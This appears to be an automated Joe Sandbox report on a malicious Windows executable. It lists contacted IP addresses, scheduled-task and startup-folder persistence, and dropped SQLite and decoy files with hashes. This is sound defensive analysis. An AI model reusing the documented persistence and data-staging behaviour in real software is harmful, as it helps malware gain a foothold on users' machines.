                                                                                                                                                                                                                                50.169.37.50
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		7922COMCAST-7922USfalse
                                                                                                                                                                                                                                182.160.100.156
                                                                                                                                                                                                                                		unknownBangladesh
                                                                                                                                                                                                                                		24323AAMRA-NETWORKS-AS-APaamranetworkslimitedBDfalse
                                                                                                                                                                                                                                103.216.51.36
                                                                                                                                                                                                                                		unknownCambodia
                                                                                                                                                                                                                                		135375TCC-AS-APTodayCommunicationCoLtdKHfalse
                                                                                                                                                                                                                                78.90.252.7
                                                                                                                                                                                                                                		unknownBulgaria
                                                                                                                                                                                                                                		20911NETSURF-AS-BGfalse
                                                                                                                                                                                                                                182.253.172.111
                                                                                                                                                                                                                                		unknownIndonesia
                                                                                                                                                                                                                                		17451BIZNET-AS-APBIZNETNETWORKSIDfalse
                                                                                                                                                                                                                                51.15.139.15
                                                                                                                                                                                                                                		unknownFrance
                                                                                                                                                                                                                                		12876OnlineSASFRfalse
                                                                                                                                                                                                                                181.78.11.217
                                                                                                                                                                                                                                		unknownArgentina
                                                                                                                                                                                                                                		52468UFINETPANAMASAPAfalse
                                                                                                                                                                                                                                194.44.177.225
                                                                                                                                                                                                                                		unknownUkraine
                                                                                                                                                                                                                                		3255UARNET-ASUARNetUAfalse
                                                                                                                                                                                                                                89.168.121.175
                                                                                                                                                                                                                                		unknownUnited Kingdom
                                                                                                                                                                                                                                		9105TISCALI-UKTalkTalkCommunicationsLimitedGBfalse
                                                                                                                                                                                                                                181.78.11.218
                                                                                                                                                                                                                                		unknownArgentina
                                                                                                                                                                                                                                		52468UFINETPANAMASAPAfalse
                                                                                                                                                                                                                                85.113.47.102
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		34533ESAMARA-ASRUfalse
                                                                                                                                                                                                                                85.237.62.189
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		12389ROSTELECOM-ASRUfalse
                                                                                                                                                                                                                                41.155.190.214
                                                                                                                                                                                                                                		unknownEgypt
                                                                                                                                                                                                                                		37069MOBINILEGfalse
                                                                                                                                                                                                                                13.234.24.116
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		16509AMAZON-02USfalse
                                                                                                                                                                                                                                139.255.193.243
                                                                                                                                                                                                                                		unknownIndonesia
                                                                                                                                                                                                                                		9905LINKNET-ID-APLinknetASNIDfalse
                                                                                                                                                                                                                                159.65.0.189
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                103.81.196.125
                                                                                                                                                                                                                                		unknownBangladesh
                                                                                                                                                                                                                                		55492DFN-BDDhakaFiberNetLimitedBDfalse
                                                                                                                                                                                                                                180.178.104.110
                                                                                                                                                                                                                                		unknownIndonesia
                                                                                                                                                                                                                                		38758HYPERNET-AS-IDPTHIPERNETINDODATAIDfalse
                                                                                                                                                                                                                                31.43.63.70
                                                                                                                                                                                                                                		unknownUkraine
                                                                                                                                                                                                                                		50581UTGUAfalse
                                                                                                                                                                                                                                103.74.229.133
                                                                                                                                                                                                                                		unknownBangladesh
                                                                                                                                                                                                                                		131340TAQWAIT-AS-APMdMozammelHoquetaTaqwaITBDfalse
                                                                                                                                                                                                                                52.35.240.119
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		16509AMAZON-02USfalse
                                                                                                                                                                                                                                45.172.177.253
                                                                                                                                                                                                                                		unknownArgentina
                                                                                                                                                                                                                                		267791INTERMEDIABUSINESSSOLUTIONSSRLARfalse
                                                                                                                                                                                                                                68.183.17.152
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                119.15.89.87
                                                                                                                                                                                                                                		unknownCambodia
                                                                                                                                                                                                                                		24492IIT-WICAM-AS-APWiCAMCorporationLtdKHfalse
                                                                                                                                                                                                                                103.25.210.102
                                                                                                                                                                                                                                		unknownIndonesia
                                                                                                                                                                                                                                		132653B-LINK-AS-IDPTTransdataSejahteraIDfalse
                                                                                                                                                                                                                                221.194.149.8
                                                                                                                                                                                                                                		unknownChina
                                                                                                                                                                                                                                		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                                                                                                                                                                                                101.51.121.29
                                                                                                                                                                                                                                		unknownThailand
                                                                                                                                                                                                                                		23969TOT-NETTOTPublicCompanyLimitedTHfalse
                                                                                                                                                                                                                                146.19.106.42
                                                                                                                                                                                                                                		unknownFrance
                                                                                                                                                                                                                                		7726FITC-ASUSfalse
                                                                                                                                                                                                                                51.81.89.146
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		16276OVHFRfalse
                                                                                                                                                                                                                                114.129.2.82
                                                                                                                                                                                                                                		unknownJapan7671MCNETNTTSmartConnectCorporationJPfalse
                                                                                                                                                                                                                                46.17.63.166
                                                                                                                                                                                                                                		unknownUnited Kingdom
                                                                                                                                                                                                                                		39326HSO-GROUPGBfalse
                                                                                                                                                                                                                                51.79.248.215
                                                                                                                                                                                                                                		unknownCanada
                                                                                                                                                                                                                                		16276OVHFRfalse
                                                                                                                                                                                                                                103.216.50.143
                                                                                                                                                                                                                                		unknownCambodia
                                                                                                                                                                                                                                		135375TCC-AS-APTodayCommunicationCoLtdKHfalse
                                                                                                                                                                                                                                62.171.131.101
                                                                                                                                                                                                                                		unknownUnited Kingdom
                                                                                                                                                                                                                                		51167CONTABODEfalse
                                                                                                                                                                                                                                103.220.205.162
                                                                                                                                                                                                                                		unknownBangladesh
                                                                                                                                                                                                                                		59362KSNETWORK-AS-APKSNetworkLimitedBDfalse
                                                                                                                                                                                                                                103.47.93.250
                                                                                                                                                                                                                                		unknownIndia
                                                                                                                                                                                                                                		9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINfalse
                                                                                                                                                                                                                                183.164.254.8
                                                                                                                                                                                                                                		unknownChina
                                                                                                                                                                                                                                		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                                                                                                                                                                                                194.9.80.1
                                                                                                                                                                                                                                		unknownunknown
                                                                                                                                                                                                                                		206495IR-SADRA-20180529IRfalse
                                                                                                                                                                                                                                212.110.188.222
                                                                                                                                                                                                                                		unknownUnited Kingdom
                                                                                                                                                                                                                                		35425BYTEMARK-ASGBfalse
                                                                                                                                                                                                                                103.47.93.248
                                                                                                                                                                                                                                		unknownIndia
                                                                                                                                                                                                                                		9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINfalse
                                                                                                                                                                                                                                201.163.73.93
                                                                                                                                                                                                                                		unknownMexico
                                                                                                                                                                                                                                		11172AlestraSdeRLdeCVMXfalse
                                                                                                                                                                                                                                202.162.105.202
                                                                                                                                                                                                                                		unknownSingapore
                                                                                                                                                                                                                                		64050BCPL-SGBGPNETGlobalASNSGfalse
                                                                                                                                                                                                                                67.205.177.122
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                212.110.188.220
                                                                                                                                                                                                                                		unknownUnited Kingdom
                                                                                                                                                                                                                                		35425BYTEMARK-ASGBfalse
                                                                                                                                                                                                                                94.182.26.44
                                                                                                                                                                                                                                		unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                		31549RASANAIRfalse
                                                                                                                                                                                                                                50.233.240.87
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		7922COMCAST-7922USfalse
                                                                                                                                                                                                                                38.253.88.242
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		174COGENT-174USfalse
                                                                                                                                                                                                                                172.67.200.220
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                13.59.156.167
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		16509AMAZON-02USfalse
                                                                                                                                                                                                                                38.242.199.111
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		36336NATIXISUSfalse
                                                                                                                                                                                                                                74.103.66.15
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		701UUNETUSfalse
                                                                                                                                                                                                                                91.185.84.228
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		49816CMST-VOLGA-SIMBIRSKASRUfalse
                                                                                                                                                                                                                                175.101.15.41
                                                                                                                                                                                                                                		unknownIndia
                                                                                                                                                                                                                                		17754EXCELL-ASExcellmediaINfalse
                                                                                                                                                                                                                                219.73.88.167
                                                                                                                                                                                                                                		unknownHong Kong
                                                                                                                                                                                                                                		4760HKTIMS-APHKTLimitedHKfalse
                                                                                                                                                                                                                                212.110.188.216
                                                                                                                                                                                                                                		unknownUnited Kingdom
                                                                                                                                                                                                                                		35425BYTEMARK-ASGBfalse
                                                                                                                                                                                                                                212.110.188.211
                                                                                                                                                                                                                                		unknownUnited Kingdom
                                                                                                                                                                                                                                		35425BYTEMARK-ASGBfalse
                                                                                                                                                                                                                                103.47.93.236
                                                                                                                                                                                                                                		unknownIndia
                                                                                                                                                                                                                                		9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINfalse
                                                                                                                                                                                                                                128.199.104.93
                                                                                                                                                                                                                                		unknownUnited Kingdom
                                                                                                                                                                                                                                		14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                212.110.188.213
                                                                                                                                                                                                                                		unknownUnited Kingdom
                                                                                                                                                                                                                                		35425BYTEMARK-ASGBfalse
                                                                                                                                                                                                                                183.215.23.242
                                                                                                                                                                                                                                		unknownChina
                                                                                                                                                                                                                                		56047CMNET-HUNAN-APChinaMobilecommunicationscorporationCNfalse
                                                                                                                                                                                                                                35.207.123.94
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		19527GOOGLE-2USfalse
                                                                                                                                                                                                                                103.189.96.98
                                                                                                                                                                                                                                		unknownunknown
                                                                                                                                                                                                                                		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                                                                                                                                                                                                                                162.144.32.209
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                                                                                                45.249.79.190
                                                                                                                                                                                                                                		unknownIndia
                                                                                                                                                                                                                                		18229CTRLS-AS-INCtrlSDatacentersLtdINfalse
                                                                                                                                                                                                                                102.132.55.250
                                                                                                                                                                                                                                		unknownSouth Africa
                                                                                                                                                                                                                                		327996ACCELERITZAfalse
                                                                                                                                                                                                                                148.72.23.56
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		26496AS-26496-GO-DADDY-COM-LLCUSfalse
                                                                                                                                                                                                                                188.40.44.95
                                                                                                                                                                                                                                		unknownGermany
                                                                                                                                                                                                                                		24940HETZNER-ASDEfalse
                                                                                                                                                                                                                                188.163.170.130
                                                                                                                                                                                                                                		unknownUkraine
                                                                                                                                                                                                                                		15895KSNET-ASUAfalse
                                                                                                                                                                                                                                186.190.225.152
                                                                                                                                                                                                                                		unknownColombia
                                                                                                                                                                                                                                		262186TVAZTECASUCURSALCOLOMBIACOfalse
                                                                                                                                                                                                                                81.250.223.126
                                                                                                                                                                                                                                		unknownFrance
                                                                                                                                                                                                                                		3215FranceTelecom-OrangeFRfalse
                                                                                                                                                                                                                                218.252.244.126
                                                                                                                                                                                                                                		unknownHong Kong
                                                                                                                                                                                                                                		9908HKCABLE2-HK-APHKCableTVLtdHKfalse
                                                                                                                                                                                                                                89.165.40.8
                                                                                                                                                                                                                                		unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                		39501NGSASIRfalse
                                                                                                                                                                                                                                47.236.56.214
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		20115CHARTER-20115USfalse
                                                                                                                                                                                                                                212.110.188.204
                                                                                                                                                                                                                                		unknownUnited Kingdom
                                                                                                                                                                                                                                		35425BYTEMARK-ASGBfalse
                                                                                                                                                                                                                                191.101.1.116
                                                                                                                                                                                                                                		unknownChile
                                                                                                                                                                                                                                		61317ASDETUKhttpwwwheficedcomGBfalse
                                                                                                                                                                                                                                94.131.14.66
                                                                                                                                                                                                                                		unknownUkraine
                                                                                                                                                                                                                                		29632NASSIST-ASGIfalse
                                                                                                                                                                                                                                92.119.74.249
                                                                                                                                                                                                                                		unknownSlovenia
                                                                                                                                                                                                                                		205715AS-FITELNETWORKESfalse
                                                                                                                                                                                                                                212.110.188.207
                                                                                                                                                                                                                                		unknownUnited Kingdom
                                                                                                                                                                                                                                		35425BYTEMARK-ASGBfalse
                                                                                                                                                                                                                                1.55.241.4
                                                                                                                                                                                                                                		unknownViet Nam
                                                                                                                                                                                                                                		18403FPT-AS-APTheCorporationforFinancingPromotingTechnolofalse
                                                                                                                                                                                                                                23.111.102.153
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		7979SERVERS-COMUSfalse
                                                                                                                                                                                                                                103.47.93.223
                                                                                                                                                                                                                                		unknownIndia
                                                                                                                                                                                                                                		9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINfalse
                                                                                                                                                                                                                                113.74.26.114
                                                                                                                                                                                                                                		unknownChina
                                                                                                                                                                                                                                		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                                                                                                                                                                                                104.17.9.114
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                45.235.16.121
                                                                                                                                                                                                                                		unknownBrazil
                                                                                                                                                                                                                                		267406AGOBrasilInternetLtdaBRfalse
                                                                                                                                                                                                                                168.227.11.135
                                                                                                                                                                                                                                		unknownBrazil
                                                                                                                                                                                                                                		28201CompanhiaItabiranaTelecomunicacoesLtdaBRfalse
                                                                                                                                                                                                                                5.161.144.46
                                                                                                                                                                                                                                		unknownGermany
                                                                                                                                                                                                                                		24940HETZNER-ASDEfalse
                                                                                                                                                                                                                                200.174.198.95
                                                                                                                                                                                                                                		unknownBrazil
                                                                                                                                                                                                                                		4230CLAROSABRfalse
                                                                                                                                                                                                                                183.88.122.200
                                                                                                                                                                                                                                		unknownThailand
                                                                                                                                                                                                                                		45758TRIPLETNET-AS-APTripleTInternetTripleTBroadbandTHfalse
                                                                                                                                                                                                                                45.71.15.136
                                                                                                                                                                                                                                		unknownBrazil
                                                                                                                                                                                                                                		267595MILANINNETBRfalse
                                                                                                                                                                                                                                180.104.0.161
                                                                                                                                                                                                                                		unknownChina
                                                                                                                                                                                                                                		137702CHINATELECOM-JIANGSU-NANJING-IDCNanjingJiangsuProvincefalse
                                                                                                                                                                                                                                124.106.228.30
                                                                                                                                                                                                                                		unknownPhilippines
                                                                                                                                                                                                                                		9299IPG-AS-APPhilippineLongDistanceTelephoneCompanyPHfalse
                                                                                                                                                                                                                                104.236.0.129
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                110.77.236.112
                                                                                                                                                                                                                                		unknownThailand
                                                                                                                                                                                                                                		131090CAT-IDC-4BYTENET-AS-APCATTELECOMPublicCompanyLtdCATTfalse
                                                                                                                                                                                                                                103.47.93.218
                                                                                                                                                                                                                                		unknownIndia
                                                                                                                                                                                                                                		9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINfalse
                                                                                                                                                                                                                                54.67.125.45
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		16509AMAZON-02USfalse
                                                                                                                                                                                                                                14.232.235.13
                                                                                                                                                                                                                                		unknownViet Nam
                                                                                                                                                                                                                                		45899VNPT-AS-VNVNPTCorpVNfalse

                                                                                                                                                                                                                                General Information

                                                                                                                                                                                                                                Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                                                Analysis ID:1407460
                                                                                                                                                                                                                                Start date and time:2024-03-12 11:26:11 +01:00
                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                Overall analysis duration:0h 14m 49s
                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                Number of analysed new started processes analysed:45
                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                Sample name:file.exe
                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                Classification:mal100.rans.troj.spyw.expl.evad.winEXE@200/533@0/100
                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                • Successful, ratio: 83.3%
                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                • Successful, ratio: 97%
                                                                                                                                                                                                                                • Number of executed functions: 264
                                                                                                                                                                                                                                • Number of non-executed functions: 207
                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                • Found application associated with file extension: .exe

                                                                                                                                                                                                                                Warnings

                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                                • Execution Graph export aborted for target InstallUtil.exe, PID 44324 because it is empty
                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                • Skipping network analysis since amount of network traffic is too extensive
                                                                                                                                                                                                                                • VT rate limit hit for: file.exe

                                                                                                                                                                                                                                Simulations

                                                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                10:28:33Task SchedulerRun new task: MalayamaraUpdate path: "C:\Users\user\AppData\Local\Temp\Updater.exe"
                                                                                                                                                                                                                                10:29:38Task SchedulerRun new task: Opera scheduled Autoupdate 1710239369 path: C:\Users\user\AppData\Local\Programs\Opera\autoupdate\opera_autoupdate.exe s>--scheduledtask --bypasslauncher $(Arg0)
                                                                                                                                                                                                                                11:27:09API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                                11:27:11API Interceptor92x Sleep call for process: file.exe modified
                                                                                                                                                                                                                                11:27:28API Interceptor400x Sleep call for process: InstallUtil.exe modified
                                                                                                                                                                                                                                11:27:29API Interceptor33x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                11:27:31AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CAjdcCiGIZYnFjRUzQZOkZkX.bat
                                                                                                                                                                                                                                11:27:44AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dArYapieKDS3mOriXwVea1ZH.bat
                                                                                                                                                                                                                                11:28:03AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kk0tFcBxArqNuZLONVKNccQ9.bat
                                                                                                                                                                                                                                11:28:21API Interceptor58x Sleep call for process: weblinkanalyzer.exe modified
                                                                                                                                                                                                                                11:28:35AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0c2kEPMEoB7jKNmSTYgGEhkC.bat
                                                                                                                                                                                                                                11:28:36API Interceptor1x Sleep call for process: f68SQOWBvY0lqnWRcqakARDI.exe modified
                                                                                                                                                                                                                                11:28:55AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0IVfGkpQqbTNp1pNVMpRFWtI.bat
                                                                                                                                                                                                                                11:28:59API Interceptor1x Sleep call for process: 23jzBT2gZ2W4aFsNb8WtTEfu.exe modified
                                                                                                                                                                                                                                11:29:09AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0vemidTikN0VMvyyqgfUpM9G.bat
                                                                                                                                                                                                                                11:29:31AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\15kxO4axYz87tjx2F18yoEOB.bat
                                                                                                                                                                                                                                11:29:54AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\296oUdYAJhNvgZMPkFJ8Adyi.bat
                                                                                                                                                                                                                                11:30:06AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2BAkuvvH6sPJYNmpYSkgEcI5.bat

                                                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                                                IPs

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                Domains

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                ASNs

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                C:\ProgramData\CAAKKFHCFIECAAAKEGCFIEHDAK

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\DHJEBGIEBFIJKEBFBFHI

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\DVWHKMNFNN.docx

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.694985340190863
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                                                                                                MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                                                                                                SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                                                                                                SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                                                                                                SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

                                                                                                                                                                                                                                C:\ProgramData\DVWHKMNFNN.xlsx

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.694985340190863
                                                                                                                                                                                                                                Encrypted:false
